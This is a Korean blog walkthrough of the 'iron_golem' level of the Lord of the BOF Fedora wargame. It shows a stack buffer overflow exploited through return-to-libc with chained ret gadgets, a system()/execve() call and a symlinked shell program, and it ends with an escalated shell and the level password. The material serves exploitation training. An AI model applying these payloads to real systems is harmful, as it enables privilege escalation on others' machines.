2012.05.11 16:53

RedHat -> Fedora 로 넘어오면서 바뀌어진 환경



1.DEP  환경  : Non-Excute stack 이라고도 불리며 스택에 있는 코드는 실행 권한없음 

  -> 즉 스택에 쉘코드를 박고 ret주소를 가리켜 공격하는 방식은 끝남. 


2.ASC Armor 기능 : Lib 주소에 맨 첫자리가 00 (NULL) 값이 됨으로써 여러번 호출이 안되고 단 한번의 라이브러리 들로만 호출이 됨. 


3. Random Stack : 스택의 주소값이 실행할 때 마다 random 하게 변한다. 즉 정확한 주소를 맞출 수 없다.

 



기존에 LOB RedHat 원정대의 경우는 쉘코드를 많이 활용 했었지만, 페도라원정대에서는 RTL 기법을 최대한 활용 하는 방향으로 가야 편하다. 


아래는 페도라의 수문장인 iron_golem 이다. 


/*

        The Lord of the BOF : The Fellowship of the BOF

        - iron_golem

        - Local BOF on Fedora Core 3

        - hint : fake ebp

*/


int main(int argc, char *argv[])

{

    char buffer[256];


    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }


    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}


정말 다시 돌아온 것같은 느낌의 쉬운 코드.. 간단하게 return adress 의 주소값을 바꿀 수 있는 구조이다. 



 [gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483d0 <main+0>:    push   %ebp
0x080483d1 <main+1>:    mov    %esp,%ebp
0x080483d3 <main+3>:    sub    $0x108,%esp //  stack 의 메모리 할당 부분 . 
0x080483d9 <main+9>:    and    $0xfffffff0,%esp
0x080483dc <main+12>:   mov    $0x0,%eax
0x080483e1 <main+17>:   add    $0xf,%eax
0x080483e4 <main+20>:   add    $0xf,%eax
0x080483e7 <main+23>:   shr    $0x4,%eax
0x080483ea <main+26>:   shl    $0x4,%eax
0x080483ed <main+29>:   sub    %eax,%esp
0x080483ef <main+31>:   cmpl   $0x1,0x8(%ebp)
0x080483f3 <main+35>:   jg     0x804840f <main+63>
0x080483f5 <main+37>:   sub    $0xc,%esp
0x080483f8 <main+40>:   push   $0x8048524
0x080483fd <main+45>:   call   0x80482f8 <_init+56>
0x08048402 <main+50>:   add    $0x10,%esp
0x08048405 <main+53>:   sub    $0xc,%esp
0x08048408 <main+56>:   push   $0x0
0x0804840a <main+58>:   call   0x8048308 <_init+72>
0x0804840f <main+63>:   sub    $0x8,%esp
0x08048412 <main+66>:   mov    0xc(%ebp),%eax
0x08048415 <main+69>:   add    $0x4,%eax
0x08048418 <main+72>:   pushl  (%eax)
0x0804841a <main+74>:   lea    0xfffffef8(%ebp),%eax
0x08048420 <main+80>:   push   %eax
0x08048421 <main+81>:   call   0x8048318 <_init+88>
0x08048426 <main+86>:   add    $0x10,%esp
0x08048429 <main+89>:   sub    $0x8,%esp
0x0804842c <main+92>:   lea    0xfffffef8(%ebp),%eax
0x08048432 <main+98>:   push   %eax
0x08048433 <main+99>:   push   $0x8048530
0x08048438 <main+104>:  call   0x80482f8 <_init+56>
0x0804843d <main+109>:  add    $0x10,%esp
0x08048440 <main+112>:  leave
0x08048441 <main+113>:  ret
0x08048442 <main+114>:  nop
0x08048443 <main+115>:  nop
End of assembler dump.
(gdb)
(gdb) print 0x108
$1 = 264
(gdb)



페이로드를 그려보면 다음과 같다. 


[buffer = 264 ] [sfp =4 ] [ret =4] [argc =4 ][argv =4 ] 



[gate@Fedora_1stFloor ~]$ cp iron_golem iron_golen

[gate@Fedora_1stFloor ~]$ ulimit -c 10000

[gate@Fedora_1stFloor ~]$ iron_golen `perl -e 'print "a"x268,"bbbb"'`

-bash: iron_golen: command not found

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"bbbb"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ gdb -c core.7

core.7049  core.7197

[gate@Fedora_1stFloor ~]$ gdb -c core.7197

GNU gdb Red Hat Linux (6.1post-1.20040607.41rh)

Copyright 2004 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux-gnu".

Core was generated by `./iron_golen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.

Program terminated with signal 11, Segmentation fault.

#0  0x62626262 in ?? ()

(gdb)



RET 주소가 bbbb 로 싀워진것을 확인 할 수 있다. 


다음은 RTL 에 쓸 system() 함수의 시작 주소값을 알아 보자.

 

[gate@Fedora_1stFloor ~]$ gdb iron_golen

GNU gdb Red Hat Linux (6.1post-1.20040607.41rh)

Copyright 2004 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".


(gdb) b main

Breakpoint 1 at 0x80483d9

(gdb) r

Starting program: /home/gate/iron_golen

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x080483d9 in main ()

(gdb) print system

$1 = {<text variable, no debug info>} 0x7507c0 <system>

(gdb)


우선 기본 RTL 공격 페이로드를 봐보자 



[buffer    264   ]  [sfp   = 4      ] [ RETURN ] [argc ]

[buffer = a*264 ] [sfp = aaaa] [ &system()] [argc]  [&(system 함수의 인자 값) ] 
                                                                                         -> ln -s  symbolic_link


sysbolic_link.c

#include<stdio.h>

int main(){

 setreuid(geteuid(),geteuid());


  system("/bin/sh");


return 0;

}

그리고 system 함수를 RET에 넣고 시작하여 인자로 쓸 부분을 확인해 보자. 


[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9ÛôþFÛôþ: command not found

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9»öþF»öþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu

sh: 9kôþFkôþ: command not found

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$


무언가가 실행 된 것을 볼 수 있으나 지정된 프로그램이나 명령어가 아니므로 command not found 가 뜨고 있다. 

그리고 그 값이 계속 변한다. 이유인 즉 아직 system 함수의 인자로 쓸 값이 Random 한 스택영역에 있기 때문이다.


우리는 이를 해결하기 위해서 스택 영역을 벗어나야 한다. 

그 중 한 방법으로 ret 의 값으로 다시 ret 주소를 넣고, 그 ret주소에는 다시 ret 주소를 넣는 방식을 사용하여 eip를 계속 올려내는 방법이 있다. 


그방법을 써서 고정된 영역으로 인자값을 옴겨 보도록 하겠다.


0x08048441 <main+113>:  ret

0x08048442 <main+114>:  nop

0x08048443 <main+115>:  nop

End of assembler dump.

(gdb)


GDB 의 disass 를 통하여 RET 의 주소값은 0x08048441 이라는 것을 알 수 있고, 이를 이용하여 위에 설명 했던 방식으로 

페이로드를 짜보자.d



[buffer    264   ]  [sfp   = 4      ] [ RETURN ] [argc ]

[buffer = a*264 ] [sfp = aaaa] [ ret = &ret ]

                                                     [ ret= &ret ]

                                                               [ret = & ret ] ......

                                                                                      [system() ] [   ]  [  인자값 ] 

                                                                                                                ln - s symbolic_link


 



[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu

sh: ‹Uðƒì‰Á1À…Òt                      eô[^_]ËMè‹@·H‹Žˆ: command not found

Segmentation fault (core dumped)ÿu‹Mä‰

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`



보면 RET을 두번만 호출 하였는데도 같은 값이 출력 됨을 확인 할 수 있다. 


이녀석들을 전부다 인자로 만들어줘야 하나 이는 너무 길어보이므로 3번 더 RET을 덮어 보겠다. 



[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu

sh: íƒ: No such file or directory

Segmentation fault (core dumped)

[gate@Fedora_1stFloor ~]$


훨씬 짧아 졌다. 이 값의 헥사값을 보기 위해서 2> 2번 오류로 저장해보자. 

 

[gate@Fedora_1stFloor ~]$ xxd r1.txt

0000000: 7368 3a20 6161 6161 3a20 4e6f 2073 7563 6820  sh: ..: No such

0000010: 6669 6c65 206f 7220 6469 7265 6374 6f72  file or director

0000020: 790a   



3a 는 : 을 의미하는 헥사 코드이다. 73 은 s 68은 h 이다 20은 공백이므로  그 사이 값인 6161 6161 이 인자값으로 들어 간 값이라는 것을 확인해 줄 수 있다. 

이를 심볼릭 링크로 걸어 보겠다. 





 [gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x61\x61\x61\x61"'`

[gate@Fedora_1stFloor ~]$ ls
(???  ???  core.7364   iron_golem.c  r1.txt  result1.txt  result.txt      aaaa       sh    shell    symbolic_link    ZY??$??
??    ?    iron_golem  iron_golen    result  result2.txt  r[gate@Fedora_1stFloor  sh.c  shell.c  symbolic_link.c  ZY??$??:
[gate@Fedora_1stFloor ~]$ pwd
/home/gate
[gate@Fedora_1stFloor ~]$ export PATH = $PATH:/home/gate
-bash: export: `=': not a valid identifier
-bash: export: `/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin:/home/gate': not a valid identifier
[gate@Fedora_1stFloor ~]$ export PATH=$PATH:/home/gate
[gate@Fedora_1stFloor ~]$ `perl -e 'print " \x61\x61\x61\x61"'`
sh-3.00$ exit
exit
[gate@Fedora_1stFloor ~]$



공격!


[gate@Fedora_1stFloor ~]$ ./iron_golem  `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAÀu

sh-3.00$ id

uid=500(gate) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$


여기까지 왔는데 UID가 상승하지 않았다. 
sh-3.00$
이유인 즉슨 system() 함수는 내부 루틴중에 geteuid 를 재설정 해주는 부분이 있기 때문에 이를 유지 할 수 없다. 따라서 system 함수의 주소값 대신에 execve 주소값을 찾아 줘야 한다. 

(gdb) p execve

$1 = {<text variable, no debug info>} 0x7a5490 <execve>

(gdb)


그리고 이 주소값에 프롤로그 부분을 건너 뛰기 위해서 1을 더해준다. 

 [gate@Fedora_1stFloor ~]$ strace ./iron_golem  `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`
execve("./iron_golem", ["./iron_golem", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz"], [/* 20 vars */]) = 0
uname({sys="Linux", node="Fedora_1stFloor", ...}) = 0
brk(0)                                  = 0x9d16000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=28384, ...}) = 0
old_mmap(NULL, 28384, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf6ff9000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \17s\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1512400, ...}) = 0
old_mmap(0x71c000, 1207532, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x71c000
old_mmap(0x83d000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x120000) = 0x83d000
old_mmap(0x841000, 7404, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x841000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6ff8000
mprotect(0x83d000, 8192, PROT_READ)     = 0
mprotect(0x718000, 4096, PROT_READ)     = 0
set_thread_area({entry_number:-1 -> 6, base_addr:0xf6ff8940, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xf6ff9000, 28384)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6fff000
write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 280aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
) = 280
execve("<íƒ", [0], [/* 1 var */])       = -1 ENOENT (No such file or directory)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++


이 내용을 텍스트 파일로 저장하고 헥사 값으로 열어보자. 


[gate@Fedora_1stFloor ~]$ strace ./iron_golem  `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'` 2> res00.txt
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
[gate@Fedora_1stFloor ~]$xxd res00.txt

execve 가 호출된 부분만을 보면 아래와 같다. 

[gate@Fedora_1stFloor ~]$ xxd res00.txt  | grep cve
0000000: 6578 6563 7665 2822 2e2f 6972 6f6e 5f67  execve("./iron_g
0000760: 7865 6376 6528 223c ed83 222c 205b 305d  xecve("<..", [0]
[gate@Fedora_1stFloor ~]$


0x22 가 " 를 의미하는 헥사 코드 이므로 그 사이에 있는 3c ed 83  헥사 코드가 인자 값으로 들어가 있는 부분이다.

이를 다시 심볼릭 링크걸어보고 공격해 보자. 


[gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x3c\xed\x83"'`

[gate@Fedora_1stFloor ~]$ ./iron_golem  `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz

[501]

sh-3.00$ id

uid=501(iron_golem) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t

sh-3.00$

sh-3.00$ my-pass
euid = 501
blood on the fedora
sh-3.00$



















Posted by k1rha